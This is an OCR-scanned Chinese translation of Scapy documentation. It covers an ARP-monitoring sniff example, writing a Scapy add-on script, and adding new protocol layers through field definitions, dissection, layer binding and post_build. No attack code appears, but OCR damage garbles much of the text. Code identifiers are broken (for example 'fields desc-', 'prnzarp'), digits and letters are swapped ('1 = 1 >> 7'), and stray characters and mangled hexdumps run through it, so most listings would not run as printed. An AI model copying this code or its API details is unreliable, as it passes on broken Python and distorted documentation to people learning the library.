使 是 混杂 模式 下 的 无 线 网 卡 上 的 801.11 数 据 帧 。 注 意 ， sniffer() BRN 
数 store=0 是 为 了 避免 将 所 有 的 数据 包 存 储 在 内 存 。 


#! /usr/bin/env python 
from scapy.all import * 


def arp monitor callback(pkt): 
if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at 
return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%" ) 
sniff(prnzarp monitor callback, filter="arp", store=0) 


这 里 有 一 个 生活 中 真实 的 例子 ， 你 可 以 参考 
WiFitap(http://sid.rstack.org/static/articles/w/i/f/Wifitap EN 9613.html). 


扩展 Scapy 


如 果 你 想 添加 一 些 新 的 协议 ， 新 的 函数 ， 或 者 任何 东西 ， 你 可 以 直接 编辑 Scapy 的 
源 代码 。 但 是 这 是 非常 不 方便 的 。 即 使 这 些 修 改 将 会 整合 到 Scapy 中 去 。 可 以 更 加 
方便 的 编写 他 们 在 单独 的 文件 中 。 


一 旦 你 这 么 做 了 ， 你 可 以 启动 Scapy 并 导入 自己 的 文件 ， 但 是 这 还 是 不 是 很 方便 ， 
另外 一 个 能 做 到 这 一 点 的 方法 是 让 你 文件 执行 并 且 调 用 Scapy 的 interact() & 
数 。 


#! /usr/bin/env python 


4 Set log level to benefit from Scapy warnings 
import logging 
logging.getLogger("scapy").setLevel(1) 


from scapy.all import * 


class Test(Packet): 
name = "Test packet" 
fields desc = [ ShortField("testi", 1), 
ShortField("test2", 2) ] 


def make test(x,y): 
return Ether()/IP()/Test(testi-x,test2-y) 


if | name == "" main "'": 
interact(mydict-globals(), mybanner="Test add-on v3.14") 


如 果 你 运行 上 面 的 代码 ， 便 会 得 到 下 面 的 结果 : 


# ./test interact.py 

Welcome to Scapy (0.9.17.109beta) 

Test add-on v3.14 

>>> make test(42,666) 

«Ether type=0x800 |«IP |«Test test1=42 test2=666 |>>> 


添加 新 的 协议 


译 者 : 草帽 小 子 _DJ 

来 源 : Python Scapy (2.3.1) 文档 学 习 ( 六 ) : 添加 新 的 协议 
原文 : Adding new protocols 

协议 : CC BY-NC-SA 2.5 


在 Scapy 中 添加 新 的 协议 (或 者 是 更 加 的 高 级 : 新 的 协议 层 ) 是 非常 容易 的 。 所 有 的 
魔法 都 在 字段 中 ， 如 果 你 需要 的 字段 已 经 有 了 ， 你 就 不 必 对 这 个 协议 太 伤 脑筋 ， 几 
分 钟 就 能 搞定 了 。 


简单 的 例子 


每 一 个 协议 层 都 是 Packet 类 的 子 类 。 协 议 层 背后 所 有 逻辑 的 操作 都 是 
被 Packet 类 和 继承 的 类 所 处 理 的 。 一 个 简单 的 协议 层 是 被 一 系列 的 字段 构成 ， 他 
们 关联 在 一 起 组 成 了 协议 层 ， 解 析 时 拆 分 成 一 个 一 个 的 字符 串 。 这 些 字段 都 包含 在 
名 为 fields desc 的 属性 中 。 每 一 个 字段 都 是 一 个 field 类 的 实例 : 


class Disney(Packet ) : 
name = "DisneyPacket " 
fields desc-[ ShortField("mickey",5), 
XByteField("minnie",3) , 
IntEnumField("donald" , 1, 
ioi UNaDPY 2 “COOL, |. so Wangi A RI 


在 这 个 例子 中 ， 我 们 的 协议 层 有 三 个 字段 ， 第 一 个 字段 是 一 个 2 个 字 节 的 短 整 型 字 
段 ， 名 字 为 mickey ， 默 认 值 是 5， 第 二 个 字段 是 1 个 自己 的 整形 字段 ， 名 字 

A minnie ， 黑 认 值 是 3， 普 通 的 ByteField 和 XByteField 之 间 的 唯一 不 同 的 
就 是 首选 的 字段 值 是 十 六 进 制 。 最 后 一 个 字段 是 一 个 4 个 字 节 的 整数 字段 ， 名 字 

A donald ， 他 不 同 于 普通 的 IntField 类 型 的 是 他 有 一 些 更 小 的 值 供 选择 ， 类 
似 于 枚 举 类 型 ， 比 如 说 ， 如 果 他 的 值 是 3 的 话 则 显示 angry 。 此 外 ， 如 

£ cool 值 被 关联 到 这 个 字段 上 ， 他 将 会 明白 接受 的 是 2. 


如 果 你 的 协议 像 上 面 这 么 简单 ， 他 已 经 可 以 用 了 : 


>>> d-Disney(mickey-1) 
>>> ls(d) 


mickey : ShortField - 1 (5) 
minnie : XByteField - 3 (3) 
donald : IntEnumField - 1 (1) 


>>> d.show() 

###[ Disney Packet ]### 

mickey- 1 

minnie- 0x3 

donald- happy 

>>> d.donald="cool" 

>>> str(d) 

' AXX00NX01NX03NXx00NX00NX00NXx02 ' 

>>> Disney( ) 

«Disney mickey=1 minnie=0x3 donald-cool |» 


本 章 讲解 了 用 Scapy 如 何 构 建 一 个 新 的 协议 ? 这 里 有 两 个 目 标 : 


分 解 : 这 样 做 是 为 了 当 接 收 到 一 个 数据 包 时 (来自 网 络 或 者 是 文件 ) 能 够 被 转化 成 
Scapy 的 内 部 结构 。 


构建 : 当 想 发 送 一 个 新 的 数据 包 时 ， 有 些 填 充 数据 需要 被 自动 的 额 调整 。 


WIL 
在 深入 剖析 之 前 ， 让 我 们 来 看 看 数据 包 是 怎样 组 织 的 。 
>>> p = IP()/TCP()/"AAAA" 
>>> p 
«IP frag-0 proto-TCP |«TCP |<Raw 1oad-'AAAA' |>>> 


>>> p.summary() 
'IP / TCP 127.0.0.1:ftp-data » 127.0.0.1:www S / Raw' 


我 们 很 感 兴趣 这 两 个 内 部 的 字段 类 Packet 
e  p.underlayer 
e p.payload 
这 里 是 主要 的 "伎俩 "。 你 不 必 在 乎 数据 包 ， 只 关注 协议 层 ， 一 个 堆 在 另 一 个 上 面 。 


一 个 可 以 通过 协议 层 的 名 字 容 易 的 访问 协议 层 : p[TCP] 返回 的 是 TCP 和 下 面 的 协 
议 ， 这 是 p.getlayer(TCP) 的 一 个 快捷 方式 。 


注意 : 这 里 有 一 个 可 选 的 参数 nb ， 用 来 返回 所 需 协 议 的 第 几 层 协议 层 。 
让 我 们 将 所 有 的 放 在 一 起 ， 玩 玩 这 个 TCP 协 议 层 : 


>>> tcp-p[TCP] 

>>> tcp.underlayer 

«IP frag-0 proto-TCP |«TCP |<Raw load='AAAA' |>>> 
>>> tcp.payload 

«Raw load='AAAA' |> 


不 出 所 料 ， tcp.underlayer 指向 的 是 我 们 IP 数 据 包 的 开始 ， 
而 tcp.payload 是 他 的 有 效 载 荷 。 


构建 一 个 新 的 协议 层 
非常 简单 ! 一 个 协议 层 就 是 由 一 系列 的 字段 构成 。 让 我 们 来 看 看 UDP 的 定义 : 
class UDP(Packet ) : 
name = "UDP" 
fields desc - [ ShortEnumField("sport", 53, UDP SERVICES), 
ShortEnumField("dport", 53, UDP SERVICES), 


ShortField("len", None), 
XShortField("chksum", None), ] 


为 了 方便 ， 内 部 已 经 定义 了 许多 字段 ， 看 看 文档 "W" 的 源码 Phil 会 告诉 你 的 。 (GEA 
我 也 不 知道 原文 是 什么 意思 ) o 


所 以 ， 定 义 一 个 协议 层 就 是 简单 的 组 合 一 系列 的 字段 ， 现 在 的 目标 是 为 每 个 字段 提 
供 有 限 的 默认 值 ， 所 以 当 用 户 构建 数据 包 的 时 候 不 必 给 他 们 赋值 。 


主要 的 机 制 是 基于 Field 结构 ， 要 牢记 协议 层 就 只 是 一 系列 的 字段 ， 不 用 记得 太 


Bo 


a ， 为 了 理解 协议 层 是 怎样 工作 的 ， 一 个 就 是 需要 快速 的 看 看 字段 是 怎么 被 处 理 
操作 数据 包 == 操 作 他 们 的 字段 
一 个 字段 应 该 被 考虑 到 有 多 种 状态 

e i (internal) : 这 是 Scapy 怎 样 操作 它们 的 方法 。 

e m (machine) : 这 是 站 正 的 数据 ， 这 就 是 他 们 在 网 络 上 的 样子 。 

e h (human) : 如 何 将 数据 展示 给 人 们 看 。 


这 解释 了 一 些 神 秘 的 方法 i2h() °> im ， m2i() 可 以 用 于 每 一 个 字段 : 他 们 
都 是 将 一 种 状态 转换 成 另 一 种 状态 ， 用 于 特殊 的 用 途 。 


其 他 特殊 的 方法 有 : 


e any2i() : 猜测 输入 的 状态 装 换 为 internal 状 态 。 


e i2repr() : X5 i2h() 更 好 。 
然而 ， 所 有 的 这 些 都 是 底层 的 方法 。 用 于 添加 或 提取 字段 到 当前 的 协议 的 方法 是 : 


e addfield(self, pkt, s, val) : 复制 网 络 上 原始 的 字段 值 val (A 
+ pkt 协议 层 的 ) 到 原始 的 字符 囊 数据 包 s 


class StrFixedLenField(StrField) : 


def addfield(self, pkt, s, val): 
return st+struct.pack("%is"%self.length, self .i2m(pkt, 


val)) 


e getfield(self, pkt, s) :从 原始 的 数据 包 s 中 提取 出 属于 协议 
层 pkt 的 字段 值 。 他 返回 一 个 序列 ， 第 一 个 元 素 是 移 除 了 被 抽取 的 字段 值 的 
原始 的 数据 包 字 符 串 ， 第 二 个 元 素 是 被 抽取 字段 的 internal 的 表示 状态 : 


class StrFixedLenField(StrField): 
def getfield(self, pkt, s): 
return s[self.length:], self.m2i(pkt,s[:self.length] 


当 定 义 你 自己 的 协议 层 ， 你 通常 只 需要 定义 一 些 *2*() 方法 ， 有 时 候 也 会 
有 addfield() 和 getfield() 方法 。 


示例 : 可 变 长 度 的 数值 


在 协议 中 经 常 使 用 可 变 长 度 的 数值 的 方法 来 表示 整数 ， 例 如 处 理 信 号 
(MIDI) 。 

每 一 个 数值 的 字 节 的 MSB 编 码 被 设置 为 1， 除 了 最 后 一 个 字 节 。 上 比如 ，0x123456 将 
会 编码 为 0xXC8E856 : 


def vleng2str(1): 


s = [] 

s.append( hex(l & Ox7F) ) 

1 = 1 >> 7 

while 1>0: 
s.append( hex(0x80 | (1 & Ox7F) ) ) 
l = 1 >> 7 


s.reverse() 
return "".join(map( lambda(x) : chr(int(x, 16)) , s)) 


def str2vlenq(s=""): 


i=l=0 
while i<len(s) and ord(s[i]) & 0x80: 
1 = 1 << 7 
1 = 1 + (ord(s[i]) & Ox7F) 
i= i+ 1 
if i == len(s): 
warning("Broken vlenq: no ending byte") 
1 = 1 << 7 
l = 1 + (ord(s[i]) & Ox7F) 


return s[xt1:],. 1 


我 们 将 定义 一 个 字段 ， 该 字段 将 自动 计算 相关 联 的 字符 囊 的 长 度 ， 但 会 使 用 该 编码 
格式 : 


class VarLenQField(Field): 
""" variable length quantities """ 


def _ init (self, name, default, fld): 
Field. (init (self, name, default) 
self.fld - fld 


def i2m(self, pkt, x): 
if Xx is None: 
= pkt.get field(self.fld) 
f.i2len(pkt, pkt.getfieldval(self.fld)) 
vlenq2str(x) 
return str(x) 


f 
X 
X 


def m2i(self, pkt, x): 
if s is None: 
return None, 0 
return str2vlenq(x)[1] 


def addfield(self, pkt, s, val): 
return s+self.i2m(pkt, val) 


def getfield(self, pkt, s): 
return str2vlenq(s) 


现在 用 这 种 字段 定义 一 个 协议 层 


class FOO(Packet ) : 
name = "FOO" 
fields desc = [ VarLenQField("len", None, "data"), 
StrLenField("data", "", "len") ] 


, 


>>> f = FOO(data="A"*129) 
>>> f.show() 
#HH[ FOO ]### 
len= 0 
data= ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAA ' 


这 里 ， len 不 必 被 计算 ， 默 认 值 会 被 直接 显示 的 ， 前 我 们 协议 层 internal 的 
表示 ， 让 我 们 强行 来 计算 一 下 : 


>>> f.show2() 
###[ FOO ]### 
len= 129 
data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAA ' 


show2() 方法 显示 这 些 字段 被 发 送 到 网 络 中 时 的 值 ， 但 是 为 了 人 类 阅读 方便 ， 我 
们 看 到 len=129 。 最 后 但 并 非 最 不 重要 ， 让 我 们 来 看 看 machine 的 表示 : 


> 
' NX81NX91AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAA ' 
前 两 个 字 节 是 Nx81Nx01 ， 是 129 编 码 后 的 结果 。 


剖析 


协议 层 只 是 一 系列 的 字段 ， 但 是 每 一 个 字段 之 间 使 用 什么 连接 的 ， 协 议 层 之 间 呢 ? 
一 节 我 们 将 解释 这 个 秘密 。 


基本 的 填充 数据 


剖析 数据 包 的 核心 的 方法 是 Packet.dissect() ° 


def dissect(self, s): 


s = self.pre dissect(s) 
S - self.do dissect(s) 
S = self.post dissect(s) 


payl,pad = self.extract padding(s) 
self.do dissect payload(payl) 
if pad and conf.padding: 

self.add payload(Padding(pad)) 


当 被 调用 时 ， s 是 一 个 将 要 被 剖析 的 字符 囊 ， self 指向 当前 协议 层 。 


>>> p=IP("A"*20)/TCP("B"*32) 

WARNING: bad dataofs (4). Assuming dataofs=5 

>>> p 

«IP version=4L ihl=1L tos=0x41 len-16705 id-16705 flags=DF frag 
-321L ttl-65 proto=65 chksum=0x4141 

src=65.65.65.65 dst=65.65.65.65 |«TCP sport=16962 dport-16962 s 
eq-1111638594L ack-1111638594L dataofs-4L 

reserved-2L flags-SE window-16962 chksum=0x4242 urgptr-16962 opt 
ions-[] |«Raw load='BBBBBBBBBBBB' |>>> 


Packet.dissect() 被 调用 了 三 次 : 
1. 解 析 "A"*20 为 IPv4 关 
2. 解 析 "B"*32 ATCPH 


3. 到 此 为 止 数据 包 还 有 12 个 字 节 ， 他 们 将 被 解析 成 原始 "Raw" 的 数据 (有 一 些 是 默认 
的 协议 层 类 型 )。 


当 传 入 一 个 协议 层 的 时 候 ， 一 切 都 很 简单 : 
e pre dissect() 在 协议 层 之 前 被 调用 。 
e do dissect() 执行 协议 层 昌 正 的 解析 。 


e post dissection() 当 解 析 时 需要 更 新 输入 的 时 候 被 调用 (比如 说 ， 解 密 ， 
解压 缩 ) 


e extract padding() 是 一 个 重要 的 方法 ， 应 该 被 每 一 层 所 调用 控制 他 们 的 大 
小 ， 所 以 他 可 以 被 用 来 区 分 看 正 相 关联 的 协议 层 的 有 效 载荷 ， 并 且 什 么 将 被 视 
为 额外 的 填充 字 节 。 

e do dissect payload() 方法 主要 负责 剖析 有 效 载荷 (如 果 有 的 话 ) 。 它 基 


于 guess payload class() (WFX) ， 一 旦 是 已 知 类 型 的 有 效 荷 载 ， 该 有 
效 载荷 将 会 以 新 的 类 型 绑 定 到 当前 协议 层 : 


def do dissect payload(self, s): 
cls - self.guess payload class(s) 
p = cls(s, internal-1,  underlayer-self) 
self .add_payload(p) 


最 后 ， 数 据 包 中 所 有 的 协议 层 都 被 解析 了 ， 并 和 已 知 的 类 型 关联 在 一 起 。 
剖析 字段 


所 有 协议 层 和 它 的 字段 之 间 的 魔法 方法 是 do dissect() 。 如 果 你 已 经 理解 了 协 
议 层 的 不 同 的 表示 ， 你 也 应 该 理解 剖析 一 个 协议 层 就 是 将 构建 它 的 字段 从 machine 
表示 转换 到 internal 表 示 。 


青 猜 是 什么 2 这 正 是 do dissect() 干 的 事 : 


def do dissect(self, s): 

flist - self.fields desc[:] 

flist.reverse() 

while s and flist: 
f - flist.pop() 
s,fval - f.getfield(self, s) 
self.fields[f] - fval 

return s 


所 以 ， 他 接受 原始 的 字符 串 数 据 包 ， 并 进入 每 一 个 字段 ， 只 要 还 有 数据 或 者 字段 剩 
£ : 


>>> FOO("\xff\xff"+"B"*8) 
<FOO 1en-2097090 data-'BBBBBBB' |» 


当 编 写 FOO("\xff\xff"+"B"*8) 的 时 候 ， 他 调用 do dissect() 方法 。 第 一 个 
字段 是 VarLenQField ， 因 此 他 接收 字 节 ， 只 要 MSB 设 置 过 ， 因 此 ， 一 直到 ( 包 
括 ) 第 一 个 "B"。 这 个 映射 做 到 了 多 亏 了 VarLenQField.getfield() ， 并 且 可 以 
进行 交叉 检查 : 


>>> vlenq2str (2097090) 
'\xff\xffB' 


然后 ， 下 一 个 字段 以 相同 的 方法 被 提取 ， 直 到 2097090 个 字 节 都 放 进 F00.data 中 
(或 者 更 少 ， 如 果 2097090 是 不 可 用 的 ) 。 


如 果 当 剖析 完 后 还 剩 下 一 些 字 节 ， 他 们 将 以 相同 的 方式 映射 到 下 一 步 要 处 理 的 (默认 
是 Raw) : 


>>> FOO( UNXO5U tLB “8,) 
<FOO len=5 data='BBBBB' |<Raw load='BBB' |>> 


此 ， 现 在 我 们 该 理解 协议 层 是 怎样 被 绑 定 在 一 起 的 。 


绑 定 协议 层 


Scapy 在 解析 协议 层 时 一 个 很 酷 的 特性 是 他 试图 猜测 下 一 层 协 议 是 什么 。 连 接 两 个 
协议 层 官 方 的 方法 是 bind layers() : 


比如 说 ， 如 果 你 有 一 个 HTTP 类 ， 你 可 能 会 认为 所 有 的 接受 或 者 发 送 的 数据 包 都 是 
80 端 口 的 ， 你 将 会 这 样 解 码 ， 下 面 是 简单 的 方式 : 


bind layers( TCP, HTTP, sport=80 ) 
bind layers( TCP, HTTP, dport=80 ) 


这 就 是 所 有 的 啦 |! 现在 所 有 和 80 端 口 相关 联 的 数据 包 都 将 被 连接 到 HTTP 协 议 层 
上 ， 不 管 他 是 从 pcap 文件 中 读 取 的 ， 还 是 从 网 络 中 接收 到 的 。 


guess payload class() Z Ùk 


有 时 候 ， 猜 测 一 个 有 效 载 荷 类 不 是 像 定 义 一 个 单一 的 端口 那么 简单 。 比 如 说 ， 他 可 
能 依赖 于 当前 协议 传 入 的 一 个 字 节 值 。 有 两 个 方法 是 必须 的 : 


e guess payload class() 必须 返回 有 效 载 荷 的 guessed 类 (下 一 层 协议 层 
的 ) 。 上 默认 情况 下 ， 它 使 用 类 之 间 已 有 的 关联 通过 bind layer() 放 到 合适 
的 位 置 。 


e default payload class() 返回 默认 的 值 。 这 个 方法 在 Packet 类 中 定义 
返回 Raw， 但 是 他 能 被 重 载 。 


比如 说 ， 解 码 802.11 的 变化 取决 于 他 是 否 被 加 密 : 


class Dot11(Packet ) : 
def guess payload class(self, payload): 
if self.FCfield & 0x40: 
return Doti1WEP 
else: 


return Packet.guess payload class(self, payload) 


这 里 有 需要 的 几 点 意见 : 


e 这 些 事 是 使 用 bind layer() 不 可 能 完成 的 ， 因 为 测试 中 应 该 
X "field--value" ,但 是 这 里 我 们 测试 的 字段 值 比 单一 的 字 节 要 发 杂 。 


e 如 果 测 试 失败 了 ， 没 有 这 种 假设 ， 我 们 会 回 到 默认 的 机 制 调 
用 Packet.guess payload class() 。 


大 多 数 时 间 ， 定 义 一 个 guess payload class() 方法 是 没有 必要 的 ， 可 以 
从 bind layers() 得 到 相同 的 结果 。 


改变 默认 的 行为 


如 果 你 不 喜欢 Scapy 得 到 协议 层 后 的 行为 ， 你 也 可 以 通过 调用 split layer() 来 
改变 或 者 禁用 这 些 行为 。 比 如 说 你 不 想 要 UDP/53 绑 定 到 DNS 协议 ， 只 需要 添加 代 
码 split layers(UDP, DNS, sport=53) ， 现 在 所 有 源 端 口 是 53 的 数据 包 都 不 会 
当做 DNS 协议 处 理 了 ， 但 是 什么 东西 你 要 做 特殊 处 理 。 


在 后 台 : 将 所 有 的 东西 都 放 在 一 起 


事实 上 ， 每 一 个 协议 层 都 有 一 个 字段 的 guess payload 。 当 你 使 
用 bind_layers() 的 方式 ， 他 将 定义 的 下 一 个 添加 到 该 列表 中 。 


>>> p-TCP() 

>>> p.payload guess 

[({'dport': 2000}, «class 'scapy.Skinny'>), ({'sport': 2000}, «c 
lass 'scapy.Skinny'>), ... )] 


然后 ， 当 他 需要 猜测 下 一 个 协议 层 类 ， 他 调用 默认 的 方 
法 Packet.guess payload class() ， 该 方法 通过 payload guess 序列 的 每 一 
个 元 素 ， 每 一 个 元 素 都 是 一 个 元 组 : 


e 第 一 个 值 是 一 个 字段 ， 我 们 用 (‘dport':2000) 测试 
e 第 二 个 值 是 guessed 类 ， 如 果 他 匹配 到 Skinny 


所 以 ， 默 认 的 guess payload class() 尝试 序列 中 所 有 的 元 素 ， 知 道 偶 一 个 匹配 
到 ， 如 果 没 发 现 一 个 元 素 ， 他 将 调用 default payload class() 。 如 果 你 重新 定 
义 了 这 个 方法 ， 你 的 方法 将 会 被 调用 ， 否 则 ， 上 默认 的 方法 会 被 调用 ，Raw 将 会 被 返 
回 。 

Packet .guess_payload class() 

e 测试 字段 中 有 什么 guess payload 


e 调用 被 重 载 的 guess payload class() 


构建 


构建 一 个 数据 包 跟 构建 每 一 个 协议 层 一 样 简单 ， 然 后 一 些 魔法 的 事情 发 生 了 当 关 联 
一 切 的 时 候 ， 让 我 们 来 试 一 试 这 些 魔法 。 


基本 的 填充 数据 


首先 要 明确 ， 构 建 是 什么 意思 ?正如 我 们 所 看 到 的 ， 一 个 协议 层 能 被 不 同 的 方法 所 
表示 (human, internal, machine)， 构 建 的 意思 是 转换 到 machine 格 式 。 

第 二 个 要 理解 的 事情 是 什么 时 候 一 个 协议 层 将 会 被 构建 。 答 案 不 是 那么 明显 ， 但 是 
当 你 需要 machine 表 示 的 时 候 ， 协 议 层 就 被 构建 了 : 当 数 据 包 在 网 络 上 被 丢弃 或 者 
写 入 一 个 文件 ， 当 他 装 换 成 一 个 字符 事 ，。。。 事 实 上 ，machine 表 示 应 该 被 视 为 
附加 了 协议 层 的 大 字符 囊 。 


>>> p = IP()/TCP() 
>>> hexdump(p) 
0000 45 00 00 28 00 01 00 00 40 06 7C CD 7F 00 00 01 E..(....@. | 


0020 50 02 20°00 91 7€ 00.00 P. ..|.. 


调用 str() 构建 这 个 数据 包 : 
e. 没有 实例 化 的 字段 设置 他 们 的 默认 值 
e 长 度 自动 更 新 
e. 计算 校 验 和 


。 等 等 


事实 上 ， 使 用 str() 而 不 是 show2() 不 是 一 个 随机 的 选择 ， 就 像 所 有 的 函数 构 
建 数 据 包 都 要 调用 Packet. str () ， 然 而 ， str () 调用 了 另 一 个 函 
数 : build() 


def str (self): 


return self. iter ().next().build() 


重要 的 也 是 要 理解 的 是 ， 通 常 你 不 必 关 心 machine 表 示 ， 这 就 是 为 什么 human 和 
internal 也 在 这 里 。 


所 以 ， 核 心 的 函数 式 build() (代码 被 缩短 了 只 保留 了 相关 的 部 分 ) 


def build(self,internal-0): 
pkt = self.do build() 
pay = self.build payload() 
p = self.post_build(pkt, pay) 
if not internal: 
pkt = self 
while pkt.haslayer (Padding): 
pkt = pkt.getlayer (Padding) 
p += pkt.load 
pkt = pkt.payload 
return p 


所 以 ， 他 通过 构建 当前 协议 层 开始 ， 然 后 是 有 效 载荷 ， 并 且 post build() 被 调 
用 更 新 后 期 的 一 些 评 估 字 段 ( 像 是 校 验 和 ) ， 最 后 将 填充 数据 添加 到 数据 包 的 尾 
部 。 


当然 ， 构 建 一 个 协议 层 和 构建 它 的 字段 是 一 样 的 ， 这 正 是 do_build() 干 的 事 。 


构建 字段 


构建 每 一 个 协议 层 的 每 一 个 字段 都 会 调用 Packet.do build() : 


def do build(self): 


pz" n 
for f in self.fields desc: 


p = f.addfield(self, p, self.getfieldval(f)) 
return p 


构建 字段 的 核心 函数 是 getfield() ,他 接收 internal 字 段 视图 ， 并 将 它 放 在 p 的 
后 面 。 通 常 ， 这 个 方法 会 调用 i2m() 并 返回 一 些 东 西 ， 
如 p.self.i2mval(val) (Æ val=self.getfieldval(f) Ab) ° 


如 果 val 设置 了 ， i2m() 只 是 一 个 必须 使 用 的 格式 化 的 方法 ， 不 如 ， 如 果 预 期 
是 一 个 字 节 ， struct.pack('B',val) 是 在 正确 转化 他 的 方法 。 


然而 ， 如 果 val 没有 被 设置 ， 事 情 将 会 变 得 更 加 复杂 ， 这 就 意味 着 不 能 简单 的 提 
供 默认 值 ， 然 后 这 些 字段 现在 或 者 以 后 需要 计 和 前 一 些 “ 填 充 数据 ”。 


“刚刚 好 "意味 着 多 亏 了 mO ， 如 果 所 有 的 信息 将 是 可 用 的 。 如 果 你 必须 处 理 一 
个 长 度 直到 遇 到 一 个 分 隔 符 。 


比如 说 : 计算 一 个 长 度 直到 遇 到 一 个 分 隔 符 : 


class XNumberField(FieldLenField): 


def — init (self, name, default, sep="\r\n"): 
FieldLenField. init__(self, name, default, fld) 
self.sep - sep 


def i2m(self, pkt, x): 
X - FieldLenField.i2m(self, pkt, x) 
return "9602x" 96 x 


def m2i(self, pkt, x): 
return int(x, 16) 


def addfield(self, pkt, s, val): 
return s+self.i2m(pkt, val) 


def getfield(self, pkt, s): 
sep - s.find(self.sep) 
return s[sep:], self.m2i(pkt, s[:sep]) 


在 这 个 例子 中 ， 在 i2m() Po wR x 已 经 有 一 个 值 ， 他 将 装 换 为 十 六 进 制 。 如 果 
没有 提供 任何 值 ， 将 会 返回 0。 


关联 由 Packet.do build() 提供 ， 他 为 协议 层 的 每 一 个 字段 调 
用 Field.addfield() 并 以 此 调用 Field.i2m() : 如 果 值 是 有 效 的 ， 协 议 层 将 
会 被 构建 。 


处 理 默认 值 : do build() 


字段 给 定 的 默认 值 有 时 候 也 不 知道 或 者 不 可 能 知道 什么 时 候 将 字段 放 在 一 起 。 比 如 
说 ， 如 果 我 们 在 协议 层 中 使 用 预先 定义 的 xNumberField ， 我 们 希望 当 他 被 构建 
是 被 设置 一 个 被 给 定 的 值 ， 然 后 如 果 他 没有 被 设置 izm() 不 会 返回 任何 值 。 


这 个 问题 的 答案 是 Packet.post build() ° 

当 这 个 方法 被 调用 ， 数 据 包 已 经 被 构建 了 ， 但 是 有 些 字段 还 是 需要 被 计算 ， 一 个 典 
型 的 例子 就 是 需要 计算 检验 和 或 者 是 长 度 。 这 是 每 一 个 字段 每 次 都 取决 于 一 些 东 

西 ， 而 不 是 当前 需要 的 。 所 以 ， 让 我 们 假设 我 们 有 一 个 有 XxNumberField 的 数据 
包 来 看 看 他 的 构建 过 程 : 


class Foo(Packet): 
fields desc = [ 
ByteField("type", 0), 
XNumberField("len", None, "\r\n"), 
StrFixedLenField("sep", "\r\n", 2) 


] 


def post_build(self, p, pay): 
if self.len is None and pay: 
1 = len(pay) 
p = p[:1] + hex(1)[2:]* p[2:] 
return p-*pay 


3 post build() 被 调用 的 时 候 ，p 是 当前 的 协议 层 ， pay 是 有 效 载荷 ， 这 就 
已 经 构建 好 了 ， 我 们 想 要 我 们 的 长 度 是 将 所 有 的 数据 都 放 到 分 隔 符 之 后 的 全 部 长 
度 ， 所 以 我 们 在 post build() 中 添加 他 们 的 计算 。 


>>> p = Foo()/("X"*32) 
>>> p.show2() 
###[ Foo ]### 


type= 0 
len= 32 
sep= '\r\n' 


###[ Raw ]### 
load- '39000000000000000000000000000000€! 


len 现在 正确 的 被 计算 : 


>>> hexdump(str(p)) 

0000 00 32 30 OD OA 58 58 58 58 58 58 58 58 58 58 58 .20..X 
XXXXXXXXXX 

0010 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXX 
XXXXXXXXXX 

0020 58 58 58 58 58 


而 且 machine 也 是 期 望 的 那样 。 


处 理 默认 值 : 自动 计算 

像 我 们 向 前 看 到 的 那样 ， 剖 析 机 制 是 建立 在 程序 员 创 造 的 协议 层 之 间 的 连接 之 上 
的 。 然 而 ， 他 也 可 以 用 在 构建 的 过 程 中 。 

在 协议 层 Foo() ， 我 们 第 一 个 字 节 的 类 型 是 在 下 面 定 义 的 ， 比 如 说 ， 如 

X type=0 ， 下 一 层 协 议 层 是 Baro ， 如 果 是 1， 下 一 层 是 协议 层 是 Bari ， 以 此 
类 推 。 我 们 希望 字段 在 下 面 自动 设置 。 


class Bari(Packet): 
fields desc - [ 
IntField("val", 0), 


] 


class Bar2(Packet): 
fields desc = [ 
IPField("addr", "127.0.0.1") 


] 


如 果 我 们 除 此 之 外 没有 做 其 他 的 事情 ， 我 们 在 解析 数据 包 的 时 候 将 会 有 麻烦 ， 不 会 
有 任何 的 Bar* REE Foo 协议 层 ， 其 至 是 当 我 们 通过 调用 show2() 函数 明确 
的 构建 数据 包 时 也 没有 。 


>>> p = Foo()/Bari(val-1337) 
>>> p 

«Foo |<Barl val=1337 |>> 
>>> p.show2() 

###[ Foo ]### 


type= 0 
len- 4 
sep- '\r\n' 


###[ Raw ]### 
load= '\x00\x00\x059' 


e type 还 是 等 于 0 当 我 们 将 它 设置 为 1 的 时 候 ， 我 们 当然 可 以 通 
过 p-Foo(type-1)/Bar0(val-1337) 来 构建 p ， 但 是 这 样 不 方便 。 


e 3 Bari 注册 为 Raw 的 时 候 ， 数 据 包 将 会 被 错误 的 解析 。 这 是 因 
为 Foo() 和 Bar*() 之 间 没 有 设置 任何 的 连接 。 


为 了 理解 我 们 应 该 怎么 做 才能 获得 适当 的 行为 ， 我 们 必须 看 看 协议 层 是 怎么 组 装 
的 。 当 两 个 独立 的 数据 包 实 例 Foo() 和 Bari(val-1337) 通过 分 隔 符 / 连接 在 
一 起 的 时 候 ， 将 产生 一 个 新 的 数据 包 ， 先 前 的 实例 被 克隆 了 (也 就 是 说 这 来 了 明确 
的 对 象 构造 不 同 ， 但 是 持 有 相同 的 值 ) ° 


def div (self, other): 

if isinstance(other, Packet): 
cloneA - self.copy() 
cloneB - other.copy() 
cloneA.add payload(cloneB) 
return cloneA 

elif type(other) is str: 
return self/Raw(load=other ) 


操作 符 右 边 的 是 左边 的 有 效 载荷 ， 这 种 行为 是 通过 调用 add payload() 完成 的 。 
最 后 返回 一 个 新 的 数据 包 。 


我 们 可 以 观察 到 ， 如 果 other 是 一 个 字符 串 而 不 是 一 个 数据 包 ，Raw 将 会 
从 payload 实例 化 得 来 。 就 像 下 面 的 例子 : 


>>> IP()/"AAAA" 
<IP |<Raw load='AAAA' |>> 


